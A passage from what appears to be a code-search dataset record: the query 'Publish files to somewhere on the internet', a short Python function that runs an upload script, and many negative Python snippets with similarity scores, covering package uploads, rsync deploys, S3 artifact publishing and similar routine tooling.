Threshold is {}\".format(confidence_threshold))\n print(\"Coverage Threshold is {}\\n\".format(coverage_threshold))\n\n support_threshold_list = [i/10 for i in range(1,11)]\n timetaken_list = []\n\n table_printer = TablePrinter(2)\n 
table_printer.set_column_headers(\"Support Threshold\", \"Time Taken\")\n table_printer.set_column_widths(30, 30)\n\n table_printer.begin()\n \n for sup_th in support_threshold_list:\n t = time.time()\n apriori.learn(sup_th, confidence_threshold, coverage_threshold, verbose = True)\n time_taken = time.time() - t\n table_printer.append_row(sup_th, round(time_taken*1000, 3))\n timetaken_list.append(time_taken)\n\n table_printer.end()\n\n plot('support_threshold', 'learning_time(seconds)', support_threshold_list, timetaken_list, [0, 1, 0, 500])", "def get(self, request, *args, **kwargs):\n query = '''\n SELECT\n DATE(bs.\"CreatedAt\"),\n count(1)\n FROM\n blood_sample_bloodsample as bs\n WHERE now() - '36 hour'::interval > bs.\"CreatedAt\" AND \\\n bs.\"State\" in ('0','4')\n GROUP BY DATE(bs.\"CreatedAt\") order by DATE(bs.\"CreatedAt\")\n '''\n\n with connection.cursor() as cursor:\n cursor.execute(query)\n processed_not_ontime = [\n [row[0], row[1]]\n for row in cursor.fetchall() if row[1]\n ]\n\n return JsonResponse(\n {\n 'status': 200,\n 'processed_not_ontime': processed_not_ontime,\n 'processed_hours': settings.PROCESSING_HOURS,\n }\n )", "def testResponseTime( pid=\"rpnt\", count=500 ) :\n pp.projectStatus2( pid )\n for i in range( count ) :\n t1 = time.time()\n sobs = \"x\"+str(i)\n sc.newProject(pid ,sobs)\n t2 = time.time()\n print \" %d %f \" % (i, t2-t1)" ]
[ "0.5688149", "0.55947673", "0.5528684", "0.55030835", "0.5432563", "0.53793204", "0.5325283", "0.53094494", "0.52589875", "0.51901346", "0.51684177", "0.5168089", "0.5163765", "0.5146831", "0.511869", "0.5105191", "0.50967735", "0.5090349", "0.5079822", "0.5079822", "0.5079822", "0.5078533", "0.50360924", "0.5035626", "0.5029966", "0.5018392", "0.5015583", "0.5009065", "0.49963132", "0.49933022", "0.49908444", "0.49882305", "0.49744022", "0.49687853", "0.49476096", "0.49390823", "0.49380988", "0.4929218", "0.4926364", "0.49211913", "0.4917141", "0.491458", "0.49138978", "0.4912976", "0.49107668", "0.48990276", "0.48966733", "0.48845983", "0.48844102", "0.48842332", "0.48778355", "0.48750806", "0.48713914", "0.4856228", "0.4843894", "0.48406616", "0.4830668", "0.48223984", "0.48156726", "0.4815157", "0.481146", "0.48045865", "0.48021534", "0.47936165", "0.47935426", "0.479325", "0.4793236", "0.47891775", "0.47871718", "0.4778681", "0.4773949", "0.47703326", "0.47589496", "0.47575244", "0.4756467", "0.47534138", "0.47420287", "0.47402552", "0.47398022", "0.47369215", "0.47362474", "0.4733547", "0.47279766", "0.47256586", "0.4724747", "0.47232985", "0.47218597", "0.47171864", "0.47123352", "0.47117025", "0.47113118", "0.47077146", "0.47003186", "0.46984243", "0.4697378", "0.46958613", "0.4695707", "0.46949667", "0.46910688", "0.46894372" ]
0.6560097
0
Publish files to somewhere on the internet.
def publish_files(): print("Publishing files to the internet...", end="", flush=True) import subprocess try: subprocess.run("./upload.sh", timeout=120.0) print("done.\n") except: print("failed.\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def publish(self, filename):\n # 1) Encrypt file\n # 2) Publish to remote cloud server\n # 3) Wait for the result\n # 4) Store results in files located inside RAM folder", "def publish():\n if sys.argv[-1] == 'publish':\n os.system('python setup.py sdist')\n os.system('twine upload dist/*')\n sys.exit()", "def publish():\n pass", "def publish():\n fab.local(\"env/bin/python setup.py sdist\")\n tar_filename = fab.local(\n \"env/bin/python setup.py --fullname\", capture=True\n )\n dist_filename = \"dist/{}.tar.gz\".format(tar_filename)\n fab.put(dist_filename, PYREPO_DIR)", "def publish(self, path):\n self.logger.info(\"Publishing %s\", path)\n try:\n self.set_workspace()\n workspace_path = getcwd()\n if workspace_path != commonpath([workspace_path, abspath(path)]):\n self.logger.error(\"Attempt to publish a non-local file %s\", path)\n raise ContextError(\n f\"Only local workspace files can be published! PATH={path}\"\n )\n if not isfile(path):\n self.logger.error(\"Attempt to publish a non-file path %s\", path)\n raise ContextError(f\"Only files can be published! PATH={path}\")\n # publish the file\n target_path = join(self._path_perm, relpath(path))\n targer_url = urljoin(self._url_base, relpath(path))\n if not isdir(self._path_perm):\n raise MissingContextError(\n f\"Permanent directory does not exist! PATH={self._path_perm}\"\n )\n if not exists(dirname(target_path)):\n makedirs(dirname(target_path))\n move(path, target_path)\n except Exception as error:\n self.logger.warning(\"Failed to publish %s! %s\", path, error)\n raise\n self.logger.debug(\"moved %s -> %s\", path, target_path)\n return target_path, targer_url", "def publish():\n reset()\n compress()\n build()\n s3deploy()\n log_success()", "def files_distribute(self):\n self._post('files/distribute')", "def checkin(url, files, message=None):\n from grit import Repo, Item\n r = Repo(url)\n\n if not files:\n raise GritError('No files')\n\n def _write(path):\n item = Item.from_path(repo=r, path=path)\n if r.isLocal():\n v.addItem(item=item)\n else:\n r.upload(filename=os.path.basename(path), filedata=open(path, 'r').read())\n\n if r.isLocal():\n v = r.addVersion()\n count = 1\n total = len(files) \n while count <= total:\n print '[%s/%s] %0.2f%%' %(count, total, (float(count) / total) * 100), '*'*count, '\\r',\n _write(os.path.abspath(files[count-1]))\n count += 1\n sys.stdout.flush()\n if message is None:\n message = 'Publishing %s' % ', '.join(files)\n if r.isLocal():\n v.save(message=message)\n print", "def pubone(file_name,alg,host):\n\n hash_alg=alg\n scheme=\"ni\"\n rform=\"json\"\n ext=\"{ \\\"meta\\\": { \\\"pubdirs\\\" : \\\"yep\\\" } }\"\n\n # record start time of this\n stime=time.time()\n\n # Create NIdigester for use with form encoder and StreamingHTTP\n ni_digester = NIdigester()\n # Install the template URL built from the scheme, the authority and the digest algorithm\n rv = ni_digester.set_url((scheme, host, \"/%s\" % hash_alg))\n if rv != ni_errs.niSUCCESS:\n nilog(\"Cannot construct valid ni URL: %s\" % ni_errs_txt[rv])\n return\n debug(ni_digester.get_url())\n # Open the file if possible\n try:\n f = open(file_name, \"rb\")\n except Exception, e :\n debug(\"Cannot open file %s: Error: %s\" %(file_name, str(e)))\n return\n # Guess the mimetype of the file\n m = magic.Magic(mime=True)\n ctype = m.from_file(file_name)\n debug(\"Content-Type: %s\" % ctype)\n if ctype is None:\n # Guessing didn't work - default\n ctype = \"application/octet-stream\"\n # Set up HTTP form data for publish request\n # Make parameter 
for file with digester\n octet_param = MultipartParam(\"octets\",\n fileobj=f,\n filetype=ctype,\n filename=file_name,\n digester = ni_digester)\n # Make dictionary that will dynamically retrieve ni URI when it has been made\n uri_dict = { \"generator\": octet_param.get_url,\n \"length\": (len(ni_digester.get_url()) + len(\";\") +\n ni_digester.get_b64_encoded_length())}\n msgid=str(random.randint(1, 2**64)) \n param_list = [octet_param,\n (\"URI\", uri_dict),\n (\"msgid\", msgid),\n (\"ext\", ext),\n (\"fullPut\", \"yes\"),\n (\"rform\", rform)]\n # Construct data generator and header strings\n datagen, headers = multipart_encode(param_list)\n if verbose:\n debug(\"Parameters prepared: %s\"% \"\".join(datagen))\n\n # Set up streaming HTTP mechanism - register handlers with urllib2\n # get out for now, don't do it\n opener = streaminghttp.register_openers()\n # Where to send the publish request.\n http_url = \"http://%s/netinfproto/publish\" % host\n # debug(\"Accessing: %s\" % http_url)\n # Send POST request to destination server\n fsize=os.path.getsize(file_name)\n nilog(\"%s,PUBLISH tx,file,%s,size,%d,to,%s\" % (msgid,file_name,fsize,host))\n try:\n req = urllib2.Request(http_url, datagen, headers)\n except Exception, e:\n nilog(\"%s,PUBLISH tx error\" % msgid);\n if verbose:\n nilog(\"Error: Unable to create request for http URL %s: %s\" %\n (http_url, str(e)))\n f.close()\n return\n # Get HTTP results\n try:\n http_object = urllib2.urlopen(req)\n except Exception, e:\n nilog(\"%s,PUBLISH rx error\" % msgid);\n if verbose:\n nilog(\"Error: Unable to access http URL %s: %s\" % (http_url, str(e)))\n f.close()\n return\n f.close()\n if verbose:\n nilog(\"Digester result: %s\" % octet_param.get_url())\n # Get message headers\n http_info = http_object.info()\n http_result = http_object.getcode()\n if verbose:\n debug(\"HTTP result: %d\" % http_result)\n debug(\"Response info: %s\" % http_info)\n debug(\"Response type: %s\" % http_info.gettype())\n\n # Read results into buffer\n payload = http_object.read()\n http_object.close()\n # debug(payload)\n # Report outcome\n if (http_result != 200):\n if verbose:\n debug(\"Unsuccessful publish request returned HTTP code %d\" %\n http_result) \n nilog(\"%s,PUBLISH rx error bad response status,%d\" % (msgid,http_result));\n return\n # Check content type of returned message matches requested response type\n ct = http_object.headers[\"content-type\"]\n if ct != \"application/json\":\n if verbose:\n debug(\"Error: Expecting JSON coded (application/json) \"\n \"response but received Content-Type: %s\" % ct)\n nilog(\"%s,PUBLISH rx error bad content type,%s\" % (msgid,ct));\n return\n # If output of response is expected, print in the requested format\n if verbose:\n nilog( \"Publication of %s successful:\" % target)\n\n # JSON cases\n try:\n json_report = json.loads(payload)\n except Exception, e:\n if verbose:\n nilog(\"Error: Could not decode JSON report '%s': %s\" % (payload,\n str(e)))\n nilog(\"%s, PUBLISH rx error bad json decode\" % msgid);\n return\n\n if verbose: \n print json.dumps(json_report, indent = 4)\n etime=time.time()\n duration=etime-stime\n niuri=json_report[\"ni\"]\n nilog(\"%s,PUBLISH rx fine,ni,%s,size,%d,time,%10.10f\" % (msgid,niuri,fsize,duration*1000))\n\n return niuri", "def cvmfsPublish(reponame = None):\n if reponame == None:\n reponame = _getRepoName()\n\n rc = subprocess.call([\"cvmfs_server\", \"publish\", \"-f\", reponame])\n if rc != 0:\n raise RuntimeError(\"Could not publish CVMFS transaction\")", "def assets_push(ctx, 
metadata, dir, brizo, price, service_endpoint, timeout):\n try:\n files = [f for f in os.listdir(dir) if os.path.isfile(dir+'/'+f)]\n except NotADirectoryError:\n files = [dir]\n\n response = []\n metadata = json.load(open(metadata, 'r'))\n\n for f in files:\n metadata['base']['files'][0]['url'] = f\n response += [ctx.invoke(assets_publish,\n metadata=metadata,\n brizo=brizo,\n price=price,\n service_endpoint=service_endpoint,\n timeout=timeout)]", "def publish(self, service, pid=None):\n\n self.db_connect()\n\n # Find all files without a DOI (and assume these are in the publication staging area).\n with self.connection:\n query = \"SELECT * FROM %s WHERE doi IS NULL\" % PUBLICATIONS_TABLE\n c = self.connection.cursor()\n c.execute(query)\n to_publish = c.fetchall()\n\n if not to_publish:\n _LOG.warning(\"No files selected for publication.\")\n return\n\n # Does the user needs to commit any modified files first?\n modified_files = subprocess.check_output(['git', 'diff', '--name-only']).split()\n for i in range(len(modified_files)):\n # Get the absolute path\n modified_files[i] = self.repo.working_dir + \"/\" + modified_files[i]\n _LOG.debug(\"Modified files: %s\" % str(modified_files))\n \n # We only care if the uncommitted changes apply to files in the 'publishing staging area'.\n overlap = False\n for f in to_publish:\n if f[\"path\"] in modified_files:\n overlap = True\n if self.repo.is_dirty() and overlap:\n _LOG.error(\"Uncomitted changes exist in the repository. Please commit these changes before trying to publish any files.\")\n return\n \n # Get the minimal amount of metadata needed to publish from the user.\n response = raw_input(\"Private publication? (y/n): \")\n if response == \"y\" or response == \"Y\":\n _LOG.info(\"Publishing as a private repository...\")\n private = True\n elif response == \"n\" or response == \"N\":\n _LOG.info(\"Publishing as a public repository...\")\n private = False\n else:\n _LOG.error(\"Unknown response '%s'. Not publishing.\" % response)\n return\n\n parameters = self.get_publication_parameters()\n \n # Publish to the repository hosting service.\n publisher = Publisher(service=service)\n pid, doi = publisher.publish_data(parameters, pid=pid, private=private)\n \n # Update the publications database by adding the DOIs and publication IDs to the previously-staged files.\n with self.connection:\n c = self.connection.cursor()\n query = \"UPDATE %s SET doi=? WHERE doi IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [doi])\n query = \"UPDATE %s SET pid=? WHERE pid IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [pid])\n query = \"UPDATE %s SET date=? WHERE date IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [str(datetime.datetime.now().date())])\n query = \"UPDATE %s SET time=? WHERE time IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [str(datetime.datetime.now().time())])\n query = \"UPDATE %s SET sha=? 
WHERE sha IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [str(self.repo.head.object.hexsha)])\n \n self.db_disconnect()\n \n return", "def download(urls, dest_folder):\n pass", "def publish(self):\n return", "def detect(self, filename):\n self.publish(filename)", "def publish(self):\n # Write the models locally\n local_path_dist = self.dump_distributions()\n local_path_model = self.dump_model()\n\n # Write them to cloud storage\n bucket_path_dist = self.get_bucket_path(self.filename_distributions)\n bucket_path_model = self.get_bucket_path(self.filename_model)\n\n config = self.services.config\n lake = self.services.lake\n\n\n lake.upload(bucket_path_dist, local_path_dist, bucket_name=config.lake_bucket)\n lake.upload(bucket_path_model, local_path_model, bucket_name=config.lake_bucket)\n\n # Now finally we want to write our reference file to our repository and build a merge request\n reference = {\n \"model\": {\n \"bucket\": config.lake_bucket,\n \"path\": bucket_path_model,\n \"md5\": file_md5(local_path_model),\n },\n \"distributions\": {\n \"bucket\": config.lake_bucket,\n \"path\": bucket_path_dist,\n \"md5\": file_md5(local_path_dist),\n },\n }\n\n return reference", "def publish(self):\n #vprint(\"PUBLISHING \",self.__dict__)\n \n js = self.compute_json()\n name = self.name\n #topicdir = \"/topicd/\" if constants.publishToS3Dev else \"/topic/\"\n s3path = constants.compositeDir+\"/\"+name+\"/main.json\" #the path where the page will finally end up\n s3.s3SetContents(s3path,contents=js,relativeTo=\"\",contentType=\"application/json\")\n self.genPage()", "def upload_release_files():\n version = get_release_version()\n target = sf_files + sourceforge_target_dir(version)\n\n print()\n print(\"Uploading release files...\")\n print(\" Source:\", release_path)\n print(\" Target: \" + target)\n print(\" Files: \" + ', '.join(glob.glob('*')))\n print()\n call_rsync(\n username,\n \"\",\n path.join(release_path, \"*\"),\n target\n )\n print()", "def publish(self, settings, item):\n\n publisher = self.parent\n engine = publisher.engine\n document = item.properties[\"document\"]\n\n path = _document_path(document)\n item.properties[\"upload_path\"] = path\n item\n psdProject = PSDImage.open(path)\n\n #save layers to link and create new task to do so\n for layer in psdProject:\n layer.compose().save(layer.name+'.tiff')\n self.logger.info(\"Saved Layer {layerName}.psd\".format(layerName=layer.name))\n publish = sgtk.util.register_publish(publisher.sgtk,\n item.context,\n os.path.join(os.path.dirname(path),layer.name+'.tiff'),\n layer.name,\n version_number=None,\n published_file_type=\"Rendered Image\")", "def publish(self, id: uplink.Path):\n pass", "def publishUploads(self, manualVerify = True):\n for key in self.nbDetails:\n # Skip metadata key if present\n if key!='proc' and self.nbDetails[key]['pkg'] and self.nbDetails[key]['archFilesOK']:\n self.publishRepoItem(key, manualVerify = manualVerify)", "def pub_upload(args, project=\"\", base_url=\"\", api_key=\"\"):\n project, base_url, api_key, updated = get_project_config(\n project=project, base_url=base_url, api_key=api_key)\n if updated:\n save_config()\n upload_theme(args, base_url, api_key, prefix=project)", "def publish(self, message: str) -> None:\n if __debug__:\n logger.warning(\n \"WARN: Unnecessary call on publish on FileDistroStream\"\n )", "def _TransferPublishManifest(self, publish_manifest, db_path_prefix,\n force_copy):\n for item in publish_manifest:\n src_path = item.current_path\n dest_path = \"%s/%s\" % 
(db_path_prefix, item.orig_path)\n logger.debug(\"TransferPublishManifest - src_path: %s, dest_path: %s.\",\n src_path, dest_path)\n\n # Transfer manifest file to published database directory.\n tries = 2\n sleep_secs = 5\n while (not serve_utils.LocalTransfer(\n src_path, dest_path,\n force_copy, prefer_copy=True, allow_symlinks=False)):\n tries -= 1\n if tries == 0:\n raise exceptions.PublishServeException(\n \"Could not transfer publish manifest file %s to %s.\" %\n (src_path, dest_path))\n logger.debug(\"Retrying Local Transfer.\")\n time.sleep(sleep_secs)\n sleep_secs *= 2 # Double the sleep time after each retry.", "def save_publish():\n import mop\n\n path = cmds.file(query=True, location=True)\n work_dir = os.path.dirname(path)\n publish_dir = os.path.join(work_dir, \"release\")\n\n highest_publish = None\n highest_version = -1\n\n for f in os.listdir(publish_dir):\n ext = os.path.splitext(f)[-1]\n if ext == \".ma\":\n pattern = r\"v(?P<version>\\d{3})\"\n regex = re.compile(pattern)\n match = regex.search(f)\n if match:\n version = int(match.group(\"version\"))\n if version > highest_version:\n highest_version = version\n highest_publish = f\n\n new_path = mop.increment_version(os.path.join(publish_dir, highest_publish))\n cmds.file(rename=new_path)\n cmds.file(save=True, force=True)", "def send_to(self, dest='.', src='/tmp/', url='localhost',\n rsync='rsync -auv'):\n files = self.setup(dest=dest, src=src)\n self.send_files(files, url=url, rsync=rsync)", "def upload():\n env.user = 'webcontent'\n rsync_project(DOCDIR, 'doc/_build/html/', delete=True)", "def __publish_dirt(self, dirt):\n self.dirt_pub.publish(dirt)", "def publish(self, file_name, c_id, size, torrent, files): # ver lo del id del cliente\n dht = get_remote_node(self.dht_ip, self.dht_port)\n v = dht.get(get_hash(file_name))\n\n if v == None:\n dht.set(get_hash(file_name), [c_id])\n cantstep = dht.get(get_hash(maxstep))\n print(\"cantstep\", cantstep)\n l = len(dht.get(get_hash(filestep + \"|\" + str(cantstep))))\n if l == lenstep: #create new step\n print(\"full step\")\n dht.set(get_hash(maxstep), cantstep + 1)\n dht.set(get_hash(filestep + \"|\" + str(cantstep + 1)), [file_name])\n else:\n all = dht.get(get_hash(filestep + \"|\" + str(cantstep)))\n all.append(file_name)\n dht.set(get_hash(filestep + \"|\" + str(cantstep)), all)\n k = sizefile + \"|\" + file_name\n dht.set(get_hash(k), size)\n dht.set(get_hash(file_name + \".torrent\"), torrent) #first time to publish this .torrent\n else:\n if not v.__contains__(c_id):\n v.append(c_id)\n dht.set(get_hash(file_name), v)\n\n dht.set(get_hash(myfiles + \"|\" + str(c_id)),files)\n print(\"client \", c_id, \"published file \", file_name)", "def deploy():\n build()\n collect()\n commit()\n push()", "def publish(self, path, document, content_type='text/plain'):\n path = ensure_slash(path)\n self.send_request('__pub', document, {\n 'path': path,\n 'type': content_type\n })\n return self.uri(path)", "def upload(ctx, release, rebuild, version):\n\n dist_path = Path(DIST_PATH)\n if rebuild is False:\n if not dist_path.exists() or not list(dist_path.glob('*')):\n print(\"No distribution files found. 
Please run 'build' command first\")\n return\n else:\n ctx.invoke(build, force=True, version=version)\n\n if release:\n args = ['twine', 'upload', 'dist/*']\n else:\n repository = 'https://test.pypi.org/legacy/'\n args = ['twine', 'upload', '--repository-url', repository, 'dist/*']\n\n env = os.environ.copy()\n\n p = subprocess.Popen(args, env=env)\n p.wait()", "def deploy():\n build()\n copy()\n install()", "def publish_list(self, messages: list) -> None:\n if __debug__:\n logger.warning(\n \"WARN: Unnecessary call on publish on FileDistroStream\"\n )", "def fast_publish(self, request):\n self.__connection.fast_publish(request)", "def upload():\n sh('python setup.py register sdist upload')", "def download_files(self):", "def perform_upload(path):\n subprocess.call(\n ['twine', 'upload', path + '/dist/*'])", "def publish(\n self,\n db: PysonDB,\n *,\n production: bool, # PyPI or Test-PyPi\n build=False, #\n force=False, # publish even if no changes\n dry_run=False, # do not actually publish\n clean: bool = False, # clean up afterwards\n ) -> (\n bool\n ): # sourcery skip: assign-if-exp, default-mutable-arg, extract-method, remove-unnecessary-else, require-parameter-annotation, swap-if-else-branches, swap-if-expression\n log.info(f\"Publish: {self.package_path.name}\")\n # count .pyi files in the package\n filecount = len(list(self.package_path.rglob(\"*.pyi\")))\n if filecount == 0:\n log.debug(f\"{self.package_name}: starting build as no .pyi files found\")\n build = True\n\n if build or force or self.is_changed():\n self.build(production=production, force=force)\n\n if not self._publish:\n log.debug(f\"{self.package_name}: skip publishing\")\n return False\n\n self.update_pkg_version(production=production)\n # Publish the package to PyPi, Test-PyPi or Github\n if self.is_changed() or force:\n if self.mpy_version == \"latest\":\n log.warning(\"version: `latest` package will only be available on Github, and not published to PyPi.\")\n self.status[\"result\"] = \"Published to GitHub\"\n else:\n self.update_hashes() # resets is_changed to False\n if not dry_run:\n pub_ok = self.poetry_publish(production=production)\n else:\n log.warning(f\"{self.package_name}: Dry run, not publishing to {'' if production else 'Test-'}PyPi\")\n pub_ok = True\n if not pub_ok:\n log.warning(f\"{self.package_name}: Publish failed for {self.pkg_version}\")\n self.status[\"error\"] = \"Publish failed\"\n return False\n self.status[\"result\"] = \"Published to PyPi\" if production else \"Published to Test-PyPi\"\n self.update_hashes()\n if dry_run:\n log.warning(f\"{self.package_name}: Dry run, not saving to database\")\n else:\n # get the package state and add it to the database\n db.add(self.to_dict())\n db.commit()\n return True\n else:\n log.info(f\"No changes to package : {self.package_name} {self.pkg_version}\")\n\n if clean:\n self.clean()\n return True", "def pub_download(args, project=\"\", base_url=\"\", api_key=\"\"):\n project, base_url, api_key, updated = get_project_config(\n project=project, base_url=base_url, api_key=api_key)\n if updated:\n save_config()\n download_theme(args, base_url, api_key, prefix=project)", "def publish(request):\n context = RequestContext(request)\n page = Page.objects.get(website=request.website, url=request.POST['page_route'])\n try:\n page.publish(context)\n page.clear_cache(context)\n purge_varnish(request)\n except Exception, e:\n # log error\n raise e\n return HttpResponse('error')\n messages.success(request, 'Your changes have been published successfully.')\n return 
HttpResponse('true')", "def copy():\n put(os.path.join('dist', get_egg_name()), remote_egg_dir)", "def cmd_gallery_publish(client, args):\n publish_to_imgur = client.share_on_imgur(args.item_id, args.title, args.terms)\n generate_output({'publish_to_imgur': publish_to_imgur})", "def upload_files(self, files):\n\n for f in files:\n self.scp.put(f, recursive=True)", "def deploy():", "def convert_to_web(base_path, files):\n for i, f in enumerate(files):\n imagetype = get_imagetype_from_filename(f)\n cmd = ('rsync '\n '{base_path}/qc/phantom/{imagetype}/{f} '\n '{base_path}/website/assets/{output}'.format(\n base_path=base_path, imagetype=imagetype, \n f=f, output=f[9:]))\n os.system(cmd)", "def deploy_nucleondocs():\n\n # Copy generated docs to docs_webserver on target machine\n rsync_project(\n remote_dir= '/srv/docs_webserver/docs/nucleon/',\n local_dir=join(dirname(__file__), 'docs/_build/html/'),\n delete=True)", "def send_files(self, files, url='localhost', rsync='rsync -auv'):\n self.url = url\n self.no_ssh = url == 'localhost' # this may need changes for tunnels\n self.rsync = rsync\n if hasattr(self, 'files_have_been_sent') and self.files_have_been_sent:\n pass\n else:\n _sync_forward(files, self.rsync, self.no_ssh, self.url)\n self.files_sent(True)", "def upload_package(self, __contents):\n raise NotImplementedError", "def sync_submission_files(self):\n blobs = GoogleStorage().list_blobs_with_prefix(self.bucket_name, 'submissions')\n\n for blob in blobs:\n destination_file_name = os.path.join(os.environ['PROJ_HOME'], blob.name)\n\n # Check if the local file exist before download file\n if not os.path.isfile(destination_file_name):\n blob.download_to_filename(destination_file_name)\n print('Downloaded file {destination_file_name}'.format(destination_file_name=destination_file_name))", "def publish(self, path, recipient, *args):\n if not os.environ.get(\"OS_PROJECT_ID\", None):\n logging.log(\n logging.ERROR,\n \"Openstack RC file hasn't been sourced in the working %s%s\",\n \"environment. 
Please source an Openstack RC file to enable\",\n \" the use of Openstack tools.\",\n )\n sys.exit(-1)\n\n container = \"shared-upload-\" + recipient + \"-\" + time.strftime(\"%Y%m%d-%H%M%S\")\n\n subprocess.call([\"swift\", \"upload\", container, path]) # nosec\n\n self.share(container, recipient, *args)", "def publish(config_filepath):\n logging.info('Projects: Listing and publishing projects')\n config = config_utils.config(config_filepath)\n batch_id = common_utils.get_unique_id()\n timestamp = common_utils.zulu_timestamp()\n published_projects = set()\n\n resources = config.value('export.resources', default=tuple())\n for resource in resources:\n projects = _get_resource_projects(resource)\n for project in projects:\n project.timestamp = timestamp\n _publish_project_details(project, config, batch_id,\n published_projects)", "def website_publish_button(self):\n if self.website_published:\n self.write({'website_published': False})\n else:\n self.write({'website_published': True})", "def publish_artifacts(self): # pylint: disable=too-many-locals\n try:\n b3resource = boto3.resource(\n 's3', endpoint_url=os.environ[\"S3_ENDPOINT_URL\"])\n dst_s3_url = os.environ[\"S3_DST_URL\"]\n multipart_threshold = 5 * 1024 ** 5 if \"google\" in os.environ[\n \"S3_ENDPOINT_URL\"] else 8 * 1024 * 1024\n config = TransferConfig(multipart_threshold=multipart_threshold)\n bucket_name = urlparse(dst_s3_url).netloc\n try:\n b3resource.meta.client.head_bucket(Bucket=bucket_name)\n except botocore.exceptions.ClientError as exc:\n error_code = exc.response['Error']['Code']\n if error_code == '404':\n # pylint: disable=no-member\n b3resource.create_bucket(Bucket=bucket_name)\n else:\n raise exc\n except Exception as exc: # pylint: disable=broad-except\n raise exc\n path = urlparse(dst_s3_url).path.strip(\"/\")\n dst_http_url = os.environ[\"HTTP_DST_URL\"]\n output_str = \"\\n\"\n # protects if test cases return details as None\n self.details = self.details or {}\n self.details[\"links\"] = []\n for log_file in [self.output_log_name, self.output_debug_log_name]:\n if os.path.exists(os.path.join(self.dir_results, log_file)):\n abs_file = os.path.join(self.dir_results, log_file)\n mime_type = mimetypes.guess_type(abs_file)\n self.__logger.debug(\n \"Publishing %s %s\", abs_file, mime_type)\n # pylint: disable=no-member\n b3resource.Bucket(bucket_name).upload_file(\n abs_file, os.path.join(path, log_file), Config=config,\n ExtraArgs={'ContentType': mime_type[\n 0] or 'application/octet-stream'})\n link = os.path.join(dst_http_url, log_file)\n output_str += f\"\\n{link}\"\n self.details[\"links\"].append(link)\n for root, _, files in os.walk(self.res_dir):\n for pub_file in files:\n abs_file = os.path.join(root, pub_file)\n mime_type = mimetypes.guess_type(abs_file)\n self.__logger.debug(\n \"Publishing %s %s\", abs_file, mime_type)\n # pylint: disable=no-member\n b3resource.Bucket(bucket_name).upload_file(\n abs_file,\n os.path.join(path, os.path.relpath(\n os.path.join(root, pub_file),\n start=self.dir_results)),\n Config=config,\n ExtraArgs={'ContentType': mime_type[\n 0] or 'application/octet-stream'})\n link = os.path.join(dst_http_url, os.path.relpath(\n os.path.join(root, pub_file),\n start=self.dir_results))\n output_str += f\"\\n{link}\"\n self.details[\"links\"].append(link)\n self.__logger.info(\n \"All artifacts were successfully published: %s\\n\", output_str)\n return TestCase.EX_OK\n except KeyError as ex:\n self.__logger.error(\"Please check env var: %s\", str(ex))\n return 
TestCase.EX_PUBLISH_ARTIFACTS_ERROR\n except botocore.exceptions.NoCredentialsError:\n self.__logger.error(\n \"Please fill ~/.aws/credentials, ~/.boto or set \"\n \"AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in env\")\n return TestCase.EX_PUBLISH_ARTIFACTS_ERROR\n except Exception: # pylint: disable=broad-except\n self.__logger.exception(\"Cannot publish the artifacts\")\n return TestCase.EX_PUBLISH_ARTIFACTS_ERROR", "def compute_published_path_to_file(self, file_to_publish: str) -> str:\n\n return os.path.join(\n self.publish_dir,\n os.path.basename(file_to_publish),\n )", "def upload():\n run('mkdir -p /srv/images/'+env.project_name+'/')\n rsync_project(\n env.project_dir, './',\n exclude=(\n '.git', '.gitignore', '__pycache__', '*.pyc', '.DS_Store', 'environment.yml',\n 'fabfile.py', 'Makefile', '.idea', 'bower_components', 'node_modules',\n '.env.example', 'README.md', 'var'\n ), delete=True)", "def make_public(self, recursive=False):\n log.warning('Cannot make %s public.', self.file_name)", "def release_pypi():\n local('python setup.py clean sdist register upload')", "def deploy():\n setup()\n builddir = get_build_dir()\n if sys.platform == 'win32':\n # Support cygwin rsync on windows:\n build_path = cygpath(slashed(builddir))\n else:\n build_path = slashed(builddir)\n rsync_project(env.admin_webroot, build_path, exclude=\".*\", delete=True)\n sudo(\"chmod -R 755 %(admin_webroot)s\" % env)", "def publish(self, message: str) -> None:", "def publish_pages(name, paths, git_repo, published_repo, extra_message=''):\n version = last_modified_commit(*paths)\n checkout_dir = '{}-{}'.format(name, version)\n check_call([\n 'git', 'clone', '--no-checkout',\n git_remote(git_repo), checkout_dir],\n echo=False,\n )\n check_call(['git', 'checkout', 'gh-pages'], cwd=checkout_dir)\n\n # package the latest version into a temporary directory\n # and run helm repo index with --merge to update index.yaml\n # without refreshing all of the timestamps\n with TemporaryDirectory() as td:\n check_call([\n 'helm', 'package', name,\n '--destination', td + '/',\n ])\n\n check_call([\n 'helm', 'repo', 'index', td,\n '--url', published_repo,\n '--merge', os.path.join(checkout_dir, 'index.yaml'),\n ])\n\n # equivalent to `cp td/* checkout/`\n # copies new helm chart and updated index.yaml\n for f in os.listdir(td):\n shutil.copy2(\n os.path.join(td, f),\n os.path.join(checkout_dir, f)\n )\n check_call(['git', 'add', '.'], cwd=checkout_dir)\n if extra_message:\n extra_message = '\\n\\n%s' % extra_message\n else:\n extra_message = ''\n check_call([\n 'git',\n 'commit',\n '-m', '[{}] Automatic update for commit {}{}'.format(name, version, extra_message)\n ], cwd=checkout_dir)\n check_call(\n ['git', 'push', 'origin', 'gh-pages'],\n cwd=checkout_dir,\n )", "def deploy(path=DEFAULT_PATH):\n files = [\n \"geo.db\",\n \"geo.php\",\n \"Spyc.php\"\n ]\n\n for file in files:\n put(file, path)\n sudo(\"chown %s:%s %s\" % (WWW_USER, WWW_USER, os.path.join(path, file)))\n\n rewrite_rules(path=path)", "def assets_publish(ctx, metadata, brizo, price, service_endpoint, timeout):\n from .api.assets import create\n response = create(metadata,\n secret_store=not brizo,\n price=price,\n service_endpoint=service_endpoint,\n timeout=timeout,\n ocean=ctx.obj['ocean'])\n echo(response)", "def get_public_url(self,project,filename):\n pass", "def publish_package_on_reposerver(sourcepath):\n ssh = utils.connect_ssh(\n dst=f'{CONDA_REPO_SETTINGS[\"user\"]}@{CONDA_REPO_SETTINGS[\"host\"]}')\n ftp_client = ssh.open_sftp()\n 
